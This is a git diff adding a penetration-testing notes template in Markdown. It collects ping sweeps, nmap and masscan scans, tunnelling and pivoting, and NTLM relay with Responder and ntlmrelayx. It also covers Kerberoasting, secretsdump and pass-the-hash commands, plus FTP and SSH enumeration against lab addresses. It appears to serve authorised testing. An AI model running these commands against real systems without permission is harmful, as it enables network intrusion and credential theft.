+# Reference: https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78
+function ResolveIp($IpAddress) {
+    try {
+        (Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost
+    } catch {
+        $null
+    }
+}
+
+function Invoke-PingSweep {
+    [CmdletBinding()]
+    Param(
+        [Parameter(Mandatory=$true)]
+        [string]$SubNet,
+        [switch]$ResolveName
+    )
+    $ips = 1..254 | ForEach-Object {"$($SubNet).$_"}
+    $ps = foreach ($ip in $ips) {
+        (New-Object Net.NetworkInformation.Ping).SendPingAsync($ip, 250)
+        #[Net.NetworkInformation.Ping]::New().SendPingAsync($ip, 250) # or if on PowerShell v5
+    }
+    [Threading.Tasks.Task]::WaitAll($ps)
+    $ps.Result | Where-Object -FilterScript {$_.Status -eq 'Success' -and $_.Address -like "$subnet*"} 
+    Select-Object Address,Status,RoundtripTime -Unique |
+    ForEach-Object {
+        if ($_.Status -eq 'Success') {
+            if (!$ResolveName) {
+                $_
+            } else {
+                $_ | Select-Object Address, @{Expression={ResolveIp($_.Address)};Label='Name'}, Status, RoundtripTime
+            }
+        }
+    }
+}
+```
+
+## Python Ping Sweep:
+
+The following python script can be used to perform a ping scan. 
+```
+#!/usr/bin/env python3
+import ipaddress
+from subprocess import Popen, DEVNULL
+
+for ping in range(1, 254):
+        address = "x.x.x.%d" % ping
+        response = Popen(["ping", "-c1", address], stdout=DEVNULL)
+        output = response.communicate()[0]
+        val1 = response.returncode
+        if val1 == 0:
+                print(address)
+```
+This script is specifically used for a /24 network. Modification required for other network types. 
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md
new file mode 100644
index 0000000..cedf233
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md	
@@ -0,0 +1,21 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+## Other tools: 
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md
new file mode 100644
index 0000000..c0145f6
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md	
@@ -0,0 +1,40 @@
+## Scanning targets
+- masscan 172.21.10.0
+- masscan 172.21.10.0/24 172.21.0.0/16
+- masscan 172.21.10.0/24 --excludeFile <File>
+- masscan 172.21.10.0/24 --exclude 172.21.10.254
+
+## Scanning for services: 
+- masscan  172.21.10.1 -p 80
+- masscan  172.21.10.1 -p 0-65535
+- masscan  172.21.10.1 -p 80,443
+- masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \
+"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\
+ -oL "output.txt"
+# UDP Scan
+- masscan 172.21.10.1 -pU 53
+
+## Report only open ports
+masscan 10.0.0.1 --open-only
+
+# Other Options
+## Offline Mode (Reviews how fast the program runs without the transmit overhead)
+- masscan 0.0.0.0/24 --offline
+
+## Obtaining Service banners:
+- masscan 172.21.10.1 --banners
+
+## Set masscan to use a source ip
+masscan 10.0.0.1 --source-ip 192.168.1.200
+
+## Change the default user agent
+masscan 10.0.0.1 --http-user-agent <user-agent>
+
+## Save sent packet in PCAP
+masscan 10.0.0.1 --pcap <filename>
+
+# References:
+
+- https://github.com/robertdavidgraham/masscan
+- https://danielmiessler.com/study/masscan/
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md
new file mode 100644
index 0000000..ff16ae7
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md	
@@ -0,0 +1,48 @@
+# Notes: 
+- remember to run nmap with sudo privlieges or set some linux capabilities to give nmap the required privileges it needs. 
+
+To set Linux Capabilities on Nmap:
+```
+sudo apt-get install libcap2-bin
+sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
+getcap $(which nmap)
+nmap --privileged
+```
+
+# Default Scans
+- nmap -sC -sV 172.21.0.0
+- nmap -Pn -sC -sV -p- 172.21.0.0
+- nmap -sV -Pn 172.21.0.0
+- nmap -T4 -sC -sV 172.21.0.0
+- nmap -vv -Pn -A -sC -sS -T 4 -p- 172.21.10.0/24 -oA fullscan
+
+
+# Stealth Scans: 
+- nmap -sS -sC -sV 172.21.0.0
+- nmap -sS -p- 172.21.0.0
+
+# UDP Scan: 
+- nmap -sS -sU -Pn -sV 172.21.0.0
+- nmap -sU -A --top-ports=20 --version-all
+- nmap -sU -A -p 53,67,68,161,162 --version-all
+
+# Aggressive Scans: 
+Once you have obtain results from your intial scan, run an aggressive scan in the background to obtain more information from the intial scan you executed: 
+
+- nmap -oA fullscan-aggressive.txt -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt
+
+If scans are not completing or skipping hosts too quickly, change the `--max-rtt-timeout` and `--max-scan-delay` settings. Additionally, for a slower, more complete, stealthier approach, the following can be used:
+- nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_x.x.x.x-all_ports_slow.xml -iL x.x.x.x_Active_IPs.txt
+
+
+TCP: 
+
+# Nmap Scripts: 
+
+Location: /usr/share/nmap/scripts/
+
+- nmap --scripts vuln,safe,discovery -oN results.txt target-ip
+
+# Scans through Socks proxy: 
+
+- nmap --proxies socks4://proxy-ip:8080 target-ip
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md
new file mode 100644
index 0000000..2803f66
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md	
@@ -0,0 +1,32 @@
+# Unicornscan: 
+- unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69
+
+# Netcat
+```
+#!/bin/bash
+for i in {0..255}; do
+    for j in {0..255};do
+        for k in {0..65535};do
+            nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt
+        done
+    done
+done
+```
+
+# Naabu
+
+Source: https://github.com/projectdiscovery/naabu
+
+## Installing Naabu: 
+
+Latest: 
+go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
+ 
+ In Kali Linux: 
+ sudo apt install naabu
+ 
+ ## Using Naabu: 
+ - naabu -host megacorpone.com
+ - naabu -p 80,443,21-23,u:53 -host megacorpone.com
+ - naabu -p - -exclude-ports 80,443 -host megacorpone.com
+ - naabu -host megacorpone.com -json
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md
new file mode 100644
index 0000000..83eae5e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md	
@@ -0,0 +1,99 @@
+# Check if your tunnel is active and running: 
+
+- nc -z localhost <port> || echo 'no tunnel open'
+- netstat -lpnt | grep <port>| grep ssh
+- ps aux | grep ssh
+- ss -ntlp
+
+# SSH Tunneling
+
+Note: Target must have SSH running for there service
+
+1. Create SSH Tunnel: ssh -D localhost:<local port> -f -N user@localhost -p <Target Port>
+2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
+3. Add the following line into the config: Socks5 127.0.0.1 <Local Port>
+4. Run commands through the tunnel: proxychains <command>
+
+## SShuttle
+
+In Kali
+
+Source: https://github.com/sshuttle/sshuttle
+
+- sshuttle -r root@172.21.0.0 10.2.2.0/24
+
+
+# Meterpreter
+
+Use only if you have a meterpreter shell and you need to pivot to another network.
+
+## Portfwd
+
+- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
+
+## Autoroute
+In Metasploit
+1. use post/multi/manage/autoroute
+```
+msf5 post(multi/manage/autoroute) > options
+
+Module options (post/multi/manage/autoroute):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
+   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
+   SESSION                   yes       The session to run this module on.
+   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)
+
+msf5 post(multi/manage/autoroute) > 
+```
+2. set session <avaliable session>
+3. run  
+
+## Metasploit Socks Proxy
+
+   1  auxiliary/server/socks4a                                  normal  No     Socks4a Proxy Server
+   2  auxiliary/server/socks5                                   normal  No     Socks5 Proxy Server
+   3  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection
+
+## Port Forwarder
+1. mknod pivot p
+2. nc -l -p < port to listen on> 0<pivot | nc <target> <pivot-port> 1>pivot
+
+# Cntlm
+
+apt install cntlm
+
+1. cntlm -u username@breakme.local -I proxy
+2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
+3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"
+
+# netsh port forwarding
+- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
+- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
+
+
+# Proxy Binaries for Windows
+Windows 10 has SSH (Thanks WSL!)
+plink.exe (In Kali)
+
+# Other Tools:
+- ssf: https://github.com/securesocketfunneling/ssf
+- rpivot: https://github.com/klsecservices/rpivot
+- hans (ICMP Tunneling): http://code.gerade.org/hans/
+- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
+- Dnscat2: https://github.com/iagox86/dnscat2
+- Chisel: https://github.com/jpillora/chisel
+- httptunnel: In Kali apt install httptunnel
+- ligolo: https://github.com/sysdream/ligolo
+- reGeorg: https://github.com/sensepost/reGeorg
+
+
+
+# Other Resources:
+
+- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
+- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
+- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md	
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md
new file mode 100644
index 0000000..e72c839
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md	
@@ -0,0 +1,6 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
+- Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html
+-  https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md
new file mode 100644
index 0000000..a4ef38f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md	
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/fortra/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md
new file mode 100644
index 0000000..f12888f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md	
@@ -0,0 +1,24 @@
+## Check for Kerberoasting: 
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+
+Kerberoasting: 
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
+- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
+- python3 getTGT.py <domain_name>/<user_name>:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md
new file mode 100644
index 0000000..7cd18d0
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md	
@@ -0,0 +1,62 @@
+# Utilizing Sock sessions with Responder and NtlmRelayX
+
+```
+ntlmrelayx> socks
+Protocol  Target          Username                  Port
+--------  --------------  ------------------------  ----
+SMB       172.21.48.38   SPAWN/MSIMMONS            445
+MSSQL     172.21.48.230  FAERIE/ADMINISTRATOR      1433
+MSSQL     172.21.48.230  FAERIE/ROOT               1433
+SMB       172.21.48.230  FAERIE/ADMINISTRATOR      445
+SMB       172.21.48.230  FAERIE/ALSIMMONS          445
+SMTP      172.21.48.225  FAERIEEXCHANGE/SBURKE     25
+SMTP      172.21.48.225  FAERIEEXCHANGE/TWILLIAMS  25
+IMAP      172.21.48.225  FAERIEEXCHANGE/TMCFARLANE 143
+```
+
+# Testing Sock Access from NtlmRelayX: 
+## SMB:
+Using SMBExec:
+- proxychains4  impacket-smbexec SPAWN/MSIMMONS@172.21.48.38
+- proxychains4  smbexec.py SPAWN/MSIMMONS@172.21.48.38
+Using Smbclient
+- proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38
+- proxychains4 smbclient.py SPAWN/MSIMMONS@172.21.48.38
+
+## Secrets Dump
+- proxychains4  impacket-secretsdump SPAWN/MSIMMONS@172.21.48.38
+- proxychains4  secretsdump.py SPAWN/MSIMMONS@172.21.48.38
+
+## Pass The Hash:
+If you obtain hashes from ntlmrelayx you can use the ntlm hash to gain access to a target using the following scripts or tools: 
+
+Impacket Wmiexec:
+- impacket-wmiexec -hashes ' INSERT HASH HERE' administrator@172.21.48.230
+- wmiexec.py -hashes ' INSERT HASH HERE' administrator@172.21.48.230
+
+Evil-WinRM:
+- evil-winrm -u Administrator -H 'INSERT HASH HERE' -i 172.21.48.230
+
+XfreeRDP: 
+- xfreerdp /u:Administrator /pth:'INSERT HASH HERE' /v:172.21.48.230
+
+# Other NtlmRelayX Commands: 
+## In Kali:
+### SMB
+- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c <Stager/Stageless Payload>
+- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c whoami
+### Ldap
+- impacket-ntlmrelayx -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$
+
+## Python Impacket: 
+### SMB
+- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt -c <Stager/Stageless Payload>
+- ntlmrelayx.py -tf smb-targets.txt -c whoami
+### LDAP
+- ntlmrelayx.py -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$
+
+# References: 
+- https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/
+-  https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
+-  https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
+- https://www.offsec-journey.com/post/attacking-ms-sql-servers
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md
new file mode 100644
index 0000000..9db11a2
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md	
@@ -0,0 +1,64 @@
+# Source: https://github.com/RedTeamPentesting/pretender
+
+# Installation
+
+## In Kali: 
+- git clone https://github.com/RedTeamPentesting/pretender
+- go build
+- pretender --help
+
+## Using Pretender: 
+- pretender -i eth0
+- pretender -i eth0 --dry (Only logs incoming queries and does not answer any of them)
+- pretender -i eth0 --dry --no-ra # without router advertisements
+
+## Options to disabled certain attacks:
+
+--no-dhcp-dns
+--no-lnr
+--no-mdns
+--no-llmnr
+--no-netbios
+--no-ra
+
+## Tips
+
+- Make sure to enable IPv6 support in `ntlmrelayx.py` with the `-6` flag
+- Pretender can be configured to stop after a certain time period for situations
+  where it cannot be aborted manually (`--stop-after` and
+  `main.vendorStopAfter`)
+- Host info lookup (which relies on the ARP table, IP neighbours and reverse
+  lookups) can be disabled with `--no-host-info` or `main.vendorNoHostInfo`
+- If you are not sure which interface to choose (especially on Windows), list
+  all interfaces with names and addresses using `--interfaces`
+- If you want to exclude hosts from local name resolution spoofing, make sure to
+  also exclude their IPv6 addresses or use
+  `--no-ipv6-lnr`/`main.vendorNoIPv6LNR`
+- DHCPv6 messages usually contain a FQDN option (which can also sometimes
+  contain a hostname which is not a FQDN). This option is used to filter out
+  messages by hostname (`--spoof-for`/`--dont-spoof-for`). You can decide what
+  to do with DHCPv6 messages without FQDN option by setting or omitting
+  `--ignore-nofqdn`
+- Depending on the build configuration, either the operating system resolver
+  (`CGO_ENABLED=1`) or a Go implementation (`CGO_ENABLED=0`) is used. This can
+  be important for host info collection because the OS resolver may support
+  local name resolution and the Go implementation does not, unless a stub
+  resolver is used.
+- The host info functionality is currently only available for Windows and Linux.
+- A custom MAC address vendor list can be compiled into the binary by replacing
+  the default list `hostinfo/mac-vendors.txt`. Only lines with MAC prefixes in
+  the following format are recognized: `FF:FF:FF<tab>VendorID<tab>Vendor` (the
+  MAC prefix length can be arbitrary).
+- If you only want to perform Kerberos relaying you can specify `--no-lnr` and
+  `--spoof-types SOA` to ignore any queries that are unrelated to the attack.
+- When conducting a Kerberos relay attack where `krbrelayx.py` runs on a
+  different host than pretender (relay IPv4 address points to different host
+  that runs `krbrelayx.py`), the host running `krbrelayx.py` will also need to
+  run pretender in order to receive and deny the Dynamic Update query sent to
+  the relay IPv4 address.
+- By default, in order to limit disruption during a DHCPv6 DNS Takeover, the
+  option `--delegate-ignored-to <DNS server>` can be used to delegate ignored
+  queries to a legitimate DNS server.
+- The option `--dry-with-dhcp` can be combined with `--delegate-ignored-to` to
+  monitor the name resolution queries in the network without disruption.
+---
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md
new file mode 100644
index 0000000..3aa02a9
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md	
@@ -0,0 +1,103 @@
+# Source: 
+
+https://github.com/lgandx/Responder
+
+# Tools in Responder: 
+
+Location: /usr/share/Responder/tools
+
+# Make changes to config to turn off services:
+
+`nano /usr/share/responder/Responder.conf`
+
+# Configuring MultiRelay: 
+In Kali Linux: 
+1. pip install pycryptodome
+2. Install Mingw and create multi relay binaries:
+```
+sudo apt-get install gcc-mingw-w64-x86-64
+sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv
+sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode
+```
+4. python3 MultiRelay.py
+```
+Usage: 
+responder-MultiRelay -t 10.20.30.40 -u Administrator lgandx admin
+responder-MultiRelay -t 10.20.30.40 -u ALL
+
+Options:
+  --version             show program's version number and exit
+  -h, --help            show this help message and exit
+  -t 10.20.30.45        Target server for SMB relay.
+  -p 8081               Additional port to listen on, this will relay for
+                        proxy, http and webdav incoming packets.
+  -u, --UserToRelay     Users to relay. Use '-u ALL' to relay all users.
+  -c whoami, --command=whoami
+                        Single command to run (scripting)
+  -d, --dump            Dump hashes (scripting)
+```
+
+
+# Starting Responder:
+
+- responder -I [Interface] -A
+- responder -I [Interface] -i [IP Address] or -e [External IP] -A
+
+## Starting Responder in Basic Authentication Mode
+- responder -I [Interface] -wdF -b
+
+## Force NTLM Authentication to version 1 instead of version 2:
+- responder -I [Interface] -wdF --lm --disable-ess
+
+## External IP Poisoning
+- responder -I [Interface] -e 172.21.1.2
+
+## DNS Injection in DHCP Responses
+- responder -i [interface] -D
+
+# Using Responder-RunFinger to verify if SMB Signing is not enabled
+
+- responder-RunFinger -i 172.21.0.0/24
+- python3 RunFinger.py -i 172.21.0.0/24
+
+# Using Responder-MultiRelay
+Tips:
+Multirelay uses the default version of mimikatz and it can easily flagged by AV. It is recommend to compile your own custom version and use it with mutlirelay.
+Do not run multirelay against targets that have smb message_signing enabled:
+
+- responder-Multirelay -t 172.21.0.0 - u ALL
+- python3 Multirelay.py -t 172.21.0.0 -u ALL
+
+# Using Responder with Impacket-Ntlmrelayx
+NtlmRelayX is an impacket script that allows you to conduct NTLM Relay Attacks, by creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).
+
+1. When you are using responder to capture challenges and relay them to ntlmrelayx you will need to turn off HTTP and SMB in the responder.conf file. Also have a list of what systems are running smb and have smb signing disabled.
+
+2. Set up a socks proxy on port 1080. This socks proxy will successfully relay the traffic to ntlmrelayx. 
+- sudo nano /etc/proxychains4.conf
+```
+[ProxyList]
+# NtlmRelayX Socks Proxy
+socks4 127.0.0.1 1080
+# Other Proxies
+```
+3. Run Responder and NtlmRelayX to watch the magic happen:
+- sudo Responder -I [Interface]
+- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt
+- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt
+
+To view a full list of captured sessions from NtlmRelayX
+```
+ntlmrelayx> socks
+Protocol  Target          Username                  Port
+--------  --------------  ------------------------  ----
+SMB       172.21.48.38   SPAWN/MSIMMONS            445
+SMB       172.21.48.230  FAERIE/ADMINISTRATOR      445
+SMB       172.21.48.230  FAERIE/ALSIMMONS          445
+```
+
+# References: 
+
+- https://github.com/lgandx/Responder
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md
new file mode 100644
index 0000000..cb63800
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md	
@@ -0,0 +1,46 @@
+# General Notes: 
+Always try anonymous login if it is avaliable: 
+
+Username: anonymous
+Password: anonymous (or keys you want to put in.)
+
+# FTP Enumeration Tools
+## Manual Connection
+```
+$ ftp 172.21.0.0
+```
+```
+$ nc -vn 172.21.0.0 21
+```
+## Connect via Browser
+```
+ftp://172.21.0.0
+```
+
+## Nmap FTP Enumeration
+```
+
+$ ls -lh /usr/share/nmap/scripts/ | grep ftp
+-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse
+-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse
+-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse
+-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse
+-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse
+-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse
+-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse
+$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse
+```
+
+## CrackMapExec
+
+```
+- crackmapexec ftp 172.21.0.0
+- crackmap exec ftp 172.21.0.0 -u 'a' -p ''
+- crackmapexec ftp 172.21.0.0 -u 'anonymous' -p '''
+
+# FTP Default wordlists: 
+/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
+
+```
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md
new file mode 100644
index 0000000..02f7e14
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md	
@@ -0,0 +1,44 @@
+# Manual Connection
+
+```
+$ ssh 172.21.0.0 -p22
+$ nc -nv 172.21.0.0 22 # Might give header
+```
+
+# SSH Enumeration Tools
+
+## Nmap Enumeration
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep ssh
+-rw-r--r-- 1 root root 5.3K Oct 12 09:29 ssh2-enum-algos.nse
+-rw-r--r-- 1 root root 1.2K Oct 12 09:29 ssh-auth-methods.nse
+-rw-r--r-- 1 root root 3.0K Oct 12 09:29 ssh-brute.nse
+-rw-r--r-- 1 root root  16K Oct 12 09:29 ssh-hostkey.nse
+-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ssh-publickey-acceptance.nse
+-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ssh-run.nse
+-rw-r--r-- 1 root root 1.4K Oct 12 09:29 sshv1.nse
+
+$ nmap 172.21.0.0 -p 22 -sV ssh-hostkey --script-args ssh_hostkey=full
+$ nmap 172.21.0.0 -p 22 -sV ssh-auth-methods --script-args="ssh.user=root"
+```
+
+## Crackmapexec
+
+```
+- crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce
+- crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce -x whoami
+```
+
+## SSH Audit: 
+Source: https://github.com/jtesta/ssh-audit
+
+```
+python ssh-audit.py [-1246pbcnjvlt] 172.21.0.0
+```
+
+## Metasploit
+```
+Auxilary Modules:
+auxiliary/scanner/ssh/ssh_version
+use scanner/ssh/ssh_enumusers
+```
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md
new file mode 100644
index 0000000..3149135
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md	
@@ -0,0 +1,68 @@
+# SMTP Ports: 
+
+25, 465, 587
+
+## Manual Connection
+```
+$ nc -nv x.x.x.x 25
+
+```
+
+# SMTP Enumeration Tools
+
+## Nmap Enumeration
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep smtp
+-rw-r--r-- 1 root root  4309 Oct 12 09:29 smtp-brute.nse
+-rw-r--r-- 1 root root  4769 Oct 12 09:29 smtp-commands.nse
+-rw-r--r-- 1 root root 12006 Oct 12 09:29 smtp-enum-users.nse
+-rw-r--r-- 1 root root  5873 Oct 12 09:29 smtp-ntlm-info.nse
+-rw-r--r-- 1 root root 10148 Oct 12 09:29 smtp-open-relay.nse
+-rw-r--r-- 1 root root   716 Oct 12 09:29 smtp-strangeport.nse
+-rw-r--r-- 1 root root 14781 Oct 12 09:29 smtp-vuln-cve2010-4344.nse
